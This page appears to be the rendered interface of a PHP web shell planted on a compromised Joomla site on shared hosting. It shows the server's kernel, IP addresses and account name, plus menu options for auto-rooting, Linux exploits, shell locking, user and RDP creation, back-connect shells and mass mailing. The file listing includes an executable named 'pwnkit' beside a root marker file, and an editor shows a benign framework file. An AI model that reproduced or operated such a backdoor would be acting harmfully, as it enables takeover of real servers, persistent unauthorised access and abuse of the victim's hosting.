Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
libraries /
fof /
form /
header /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
accesslevel.php
1.02
KB
-rw-r--r--
field.php
928
B
-rw-r--r--
fielddate.php
3.2
KB
-rw-r--r--
fieldfilterable.php
2.74
KB
-rw-r--r--
fieldsearchable.php
2.74
KB
-rw-r--r--
fieldselectable.php
3.27
KB
-rw-r--r--
fieldsql.php
1.66
KB
-rw-r--r--
filterdate.php
623
B
-rw-r--r--
filterfilterable.php
634
B
-rw-r--r--
filtersearchable.php
634
B
-rw-r--r--
filterselectable.php
630
B
-rw-r--r--
filtersql.php
612
B
-rw-r--r--
language.php
1.02
KB
-rw-r--r--
model.php
2.85
KB
-rw-r--r--
ordering.php
1.8
KB
-rw-r--r--
published.php
1.28
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rowselect.php
723
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : language.php
<?php /** * @package FrameworkOnFramework * @subpackage form * @copyright Copyright (C) 2010-2016 Nicholas K. Dionysopoulos / Akeeba Ltd. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ // Protect from unauthorized access defined('FOF_INCLUDED') or die; /** * Language field header * * @package FrameworkOnFramework * @since 2.0 */ class FOFFormHeaderLanguage extends FOFFormHeaderFieldselectable { /** * Method to get the filter options. * * @return array The filter option objects. * * @since 2.0 */ protected function getOptions() { // Initialize some field attributes. $client = (string) $this->element['client']; if ($client != 'site' && $client != 'administrator') { $client = 'site'; } // Merge any additional options in the XML definition. $options = array_merge( parent::getOptions(), JLanguageHelper::createLanguageList($this->value, constant('JPATH_' . strtoupper($client)), true, true) ); return $options; } }
Close